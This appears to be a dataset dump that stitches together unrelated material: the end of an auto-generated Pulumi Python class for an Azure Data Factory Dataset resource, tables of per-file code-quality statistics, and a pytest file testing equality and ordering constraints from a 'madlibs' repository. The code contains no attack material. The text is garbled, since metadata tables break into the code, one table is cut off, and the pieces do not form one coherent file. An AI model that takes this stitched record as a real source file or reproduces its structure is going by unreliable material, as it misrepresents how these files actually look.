'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']]:
"""
Dataset properties.
"""
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']]):
pulumi.set(self, "properties", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="datasetName")
def dataset_name(self) -> Optional[pulumi.Input[str]]:
"""
The dataset name.
"""
return pulumi.get(self, "dataset_name")
@dataset_name.setter
def dataset_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dataset_name", value)
class Dataset(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dataset_name: Optional[pulumi.Input[str]] = None,
factory_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], 
pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Dataset resource type.
API Version: 2018-06-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dataset_name: The dataset name.
:param pulumi.Input[str] factory_name: The factory name.
:param pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], 
pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]] properties: Dataset properties.
:param pulumi.Input[str] resource_group_name: The resource group name.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DatasetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Dataset resource type.
API Version: 2018-06-01.
:param str resource_name: The name of the resource.
:param DatasetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DatasetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dataset_name: Optional[pulumi.Input[str]] = None,
factory_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], 
pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DatasetArgs.__new__(DatasetArgs)
__props__.__dict__["dataset_name"] = dataset_name
if factory_name is None and not opts.urn:
raise TypeError("Missing required property 'factory_name'")
__props__.__dict__["factory_name"] = factory_name
if properties is None and not opts.urn:
raise TypeError("Missing required property 'properties'")
__props__.__dict__["properties"] = properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datafactory:Dataset"), pulumi.Alias(type_="azure-native:datafactory/v20170901preview:Dataset"), pulumi.Alias(type_="azure-nextgen:datafactory/v20170901preview:Dataset"), pulumi.Alias(type_="azure-native:datafactory/v20180601:Dataset"), pulumi.Alias(type_="azure-nextgen:datafactory/v20180601:Dataset")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Dataset, __self__).__init__(
'azure-native:datafactory:Dataset',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Dataset':
"""
Get an existing Dataset resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DatasetArgs.__new__(DatasetArgs)
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return Dataset(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
Etag identifies change in the resource.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output[Any]:
"""
Dataset properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The resource type.
"""
return pulumi.get(self, "type")
```

Per-file statistics and quality signals (same layout as record 1):

| Field | Value | Flag |
|---|---|---|
| avg_line_length | 146.711712 | |
| max_line_length | 4,437 | |
| alphanum_fraction | 0.7965 | |
| qsc_code_num_words | 2,165 | 0 |
| qsc_code_num_chars | 32,570 | 0 |
| qsc_code_mean_word_length | 11.839723 | 1 |
| qsc_code_frac_words_unique | 0.107159 | null |
| qsc_code_frac_chars_top_2grams | 0.163266 | 0 |
| qsc_code_frac_chars_top_3grams | 0.012562 | 0 |
| qsc_code_frac_chars_top_4grams | 0.007724 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.917801 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.895564 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.882417 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.858191 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.852417 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.845863 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.003071 | 0 |
| qsc_code_frac_chars_whitespace | 0.090083 | 0 |
| qsc_code_size_file_byte | 32,570 | 0 |
| qsc_code_num_lines | 221 | 0 |
| qsc_code_num_chars_line_max | 4,438 | 1 |
| qsc_code_num_chars_line_mean | 147.375566 | 1 |
| qsc_code_frac_chars_alphabet | 0.861857 | 0 |
| qsc_code_frac_chars_comments | 0.267178 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.321168 | 0 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.532855 | 0 |
| qsc_code_frac_chars_long_word_length | 0.439708 | 1 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.131387 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.007299 | 0 |
| qsc_codepython_frac_lines_import | 0.058394 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.270073 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
| effective | 0 | |
| hits | 11 | |
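For the complete rows shown here the unsuffixed 0/1 columns sum to the row's `hits` value (7 for the atomic-puppy tests, 11 for this generated Pulumi file), which suggests `hits` counts how many individual signals were flagged. A quick consistency check, under the same hypothetical loading assumptions as the earlier sketch:

```python
import pandas as pd

df = pd.read_parquet("code_quality_signals.parquet")  # hypothetical file name, as above
flag_cols = [c[: -len("_quality_signal")] for c in df.columns if c.endswith("_quality_signal")]
flag_sum = (
    df[flag_cols]
    .apply(pd.to_numeric, errors="coerce")  # the two all-null flag columns become NaN
    .fillna(0)
    .sum(axis=1)
    .astype(int)
)
print((flag_sum == df["hits"]).all())
```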
Record 3: utahnlp/madlibs, tests/test_constraints.py

| Field | Value |
|---|---|
| hexsha | b2bacb9b01e22c028fbb0e67098b278d8e920573 |
| size | 2,790 |
| ext | py |
| lang | Python |
| max_stars_repo_path, max_issues_repo_path, max_forks_repo_path | tests/test_constraints.py |
| max_stars_repo_name, max_issues_repo_name, max_forks_repo_name | utahnlp/madlibs |
| max_stars_repo_head_hexsha, max_issues_repo_head_hexsha, max_forks_repo_head_hexsha | 6a41051ea79599971e76b31023fcdb2b7f067eab |
| max_stars_repo_licenses, max_issues_repo_licenses, max_forks_repo_licenses | ["MIT"] |
| max_stars_count, max_issues_count, max_forks_count | null |
| stars/issues/forks event min/max datetimes | null |

content:

```python
import pytest
from madlibs.constraints import make_constraint
def test_equality_constraint():
c = make_constraint("equals", "a", "b")
assert c.check({"a": "1", "b": "1"})
assert not c.check({"a": "1", "b": "2"})
assert c.check({"a": "apple", "b": "apple"})
assert not c.check({"a": "apple", "b": "cat"})
def test_equality_exceptions():
with pytest.raises(Exception):
c = make_constraint("equals", "a")
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b")
c.check({"b": "1"})
def test_inequality_constraint():
c = make_constraint("not_equals", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert c.check({"a": "1", "b": "2"})
assert not c.check({"a": "apple", "b": "apple"})
assert c.check({"a": "apple", "b": "cat"})
def test_inequality_exceptions():
with pytest.raises(Exception):
c = make_constraint("not_equals", "a")
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b")
c.check({"b": "1"})
def test_less_than_constraint():
c = make_constraint("less_than", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert c.check({"a": "1", "b": "2"})
assert not c.check({"a": "2", "b": "1"})
def test_less_than_exceptions():
with pytest.raises(Exception):
c = make_constraint("less_than", "a")
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b")
c.check({"b": "1"})
def test_greater_than_constraint():
c = make_constraint("greater_than", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert not c.check({"a": "1", "b": "2"})
assert c.check({"a": "2", "b": "1"})
def test_greater_than_exceptions():
with pytest.raises(Exception):
c = make_constraint("greater_than", "a")
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b")
c.check({"b": "1"})
```

Per-file statistics and quality signals (same layout as record 1):

| Field | Value | Flag |
|---|---|---|
| avg_line_length | 27.9 | |
| max_line_length | 58 | |
| alphanum_fraction | 0.562724 | |
| qsc_code_num_words | 381 | 0 |
| qsc_code_num_chars | 2,790 | 0 |
| qsc_code_mean_word_length | 3.973753 | 0 |
| qsc_code_frac_words_unique | 0.076115 | null |
| qsc_code_frac_chars_top_2grams | 0.087186 | 0 |
| qsc_code_frac_chars_top_3grams | 0.198151 | 1 |
| qsc_code_frac_chars_top_4grams | 0.264201 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.922721 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.909511 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.870542 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.801849 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.739102 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.677675 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.012826 | 0 |
| qsc_code_frac_chars_whitespace | 0.217563 | 0 |
